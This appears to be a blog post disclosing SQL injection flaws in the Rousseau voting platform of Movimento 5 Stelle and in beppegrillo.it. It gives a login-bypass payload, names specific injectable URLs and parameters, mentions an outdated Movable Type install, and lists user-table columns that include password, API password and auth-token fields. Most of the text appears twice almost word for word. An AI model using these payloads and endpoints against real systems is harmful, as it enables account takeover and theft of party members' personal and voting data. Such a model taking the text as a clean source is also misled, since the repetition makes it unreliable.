A simple sql injection is needed to login with *any* user
example: ' or '1'='1.
https://rousseau.movimento5stelle.it/login.php
Sql injection where sharing_id is a table in the group by clause.
https://rousseau.movimento5stelle.it/edit_atto.php?id=1258&sharing_id=[sqli]
http://www.beppegrillo.it/marcia_virtuale/vmarcia/auslesen.php?start=14040&z=[sqli]
"Fixed" - Update 09/08/2017:
I found accidentaly (august 2018) an archived page (I didn't archived it!) that is showing sensitive informations without an SQLi. Probably the page was tampered by someone or the script itself didn't work correctly.
https://archive.li/cmKkC
-
sample for the voting system: voting_votazioni voting_votazioni_vote
The main website also uses movable type 4 with vulnerabilities.
Sample cols
author_federated_id | author_federated_video | author_federated_comune_id | author_federated_candidato | author_federated_regione_id | author_federated_profile_id | author_federated_external_id | author_federated_provincia_id | author_federated_userpic_asset_id | author_federated_candidato_europa | author_federated_candidato_comune | author_federated_circoscrizione_id | author_federated_candidato_regione | author_federated_eletto_a_comune_id | author_federated_circoscrizione_europa_id | author_federated_circoscrizione_europa_regione_id | author_federated_circoscrizione_europa_provincia_id | author_federated_cv | author_federated_url | author_federated_name | author_federated_hint | author_federated_nome | author_federated_type | author_federated_sesso | author_federated_email | author_federated_eletto | author_federated_meetup | author_federated_status | author_federated_nazione | author_federated_twitter | author_federated_cognome | author_federated_esp_pol | author_federated_citta_1 | author_federated_citta_2 | author_federated_basename | author_federated_nickname | author_federated_linkedin | author_federated_facebook | author_federated_password | author_federated_immagine | author_federated_attivismo | author_federated_auth_type | author_federated_cellulare | author_federated_created_on | author_federated_created_by | author_federated_public_key | author_federated_modified_on | author_federated_entry_prefs | author_federated_professione | author_federated_text_format | author_federated_modified_by | author_federated_can_view_log | author_federated_citta_nato_a | author_federated_is_superuser | author_federated_personalsite | author_federated_api_password | author_federated_presentazione author_federated_eletto_comune | author_federated_citta_mapping | author_federated_eletto_europa | author_federated_eletto_regione | author_federated_citta_eletto_a | author_federated_can_create_blog | author_federated_data_di_nascita | author_federated_titolo_di_studio | author_federated_remote_auth_token | author_federated_preferred_language | author_federated_scadenza_documento | author_federated_remote_auth_username | author_federated_citta_zona_municipio | author_federated_sms_check_code_status | author_federated_sindaco_consigliere_provincia
example: ' or '1'='1.
https://rousseau.movimento5stelle.it/login.php
Sql injection where sharing_id is a table in the group by clause.
https://rousseau.movimento5stelle.it/edit_atto.php?id=1258&sharing_id=[sqli]
http://www.beppegrillo.it/marcia_virtuale/vmarcia/auslesen.php?start=14040&z=[sqli]
"Fixed" - Update 09/08/2017:
Hanno rimosso da BeppeGrillo.it la pagina "Marcia virtuale" e il file PHP che riportava i dati in chiaro (https://t.co/3FeUPiHQ8E) pic.twitter.com/8abp2ItTxa— David Puente (@DavidPuente) 9 agosto 2017
I found accidentaly (august 2018) an archived page (I didn't archived it!) that is showing sensitive informations without an SQLi. Probably the page was tampered by someone or the script itself didn't work correctly.
https://archive.li/cmKkC
-
sample for the voting system: voting_votazioni voting_votazioni_vote
The main website also uses movable type 4 with vulnerabilities.
Sample cols
author_federated_id | author_federated_video | author_federated_comune_id | author_federated_candidato | author_federated_regione_id | author_federated_profile_id | author_federated_external_id | author_federated_provincia_id | author_federated_userpic_asset_id | author_federated_candidato_europa | author_federated_candidato_comune | author_federated_circoscrizione_id | author_federated_candidato_regione | author_federated_eletto_a_comune_id | author_federated_circoscrizione_europa_id | author_federated_circoscrizione_europa_regione_id | author_federated_circoscrizione_europa_provincia_id | author_federated_cv | author_federated_url | author_federated_name | author_federated_hint | author_federated_nome | author_federated_type | author_federated_sesso | author_federated_email | author_federated_eletto | author_federated_meetup | author_federated_status | author_federated_nazione | author_federated_twitter | author_federated_cognome | author_federated_esp_pol | author_federated_citta_1 | author_federated_citta_2 | author_federated_basename | author_federated_nickname | author_federated_linkedin | author_federated_facebook | author_federated_password | author_federated_immagine | author_federated_attivismo | author_federated_auth_type | author_federated_cellulare | author_federated_created_on | author_federated_created_by | author_federated_public_key | author_federated_modified_on | author_federated_entry_prefs | author_federated_professione | author_federated_text_format | author_federated_modified_by | author_federated_can_view_log | author_federated_citta_nato_a | author_federated_is_superuser | author_federated_personalsite | author_federated_api_password | author_federated_presentazione author_federated_eletto_comune | author_federated_citta_mapping | author_federated_eletto_europa | author_federated_eletto_regione | author_federated_citta_eletto_a | author_federated_can_create_blog | author_federated_data_di_nascita | author_federated_titolo_di_studio | author_federated_remote_auth_token | author_federated_preferred_language | author_federated_scadenza_documento | author_federated_remote_auth_username | author_federated_citta_zona_municipio | author_federated_sms_check_code_status | author_federated_sindaco_consigliere_provincia
Comments
Post a Comment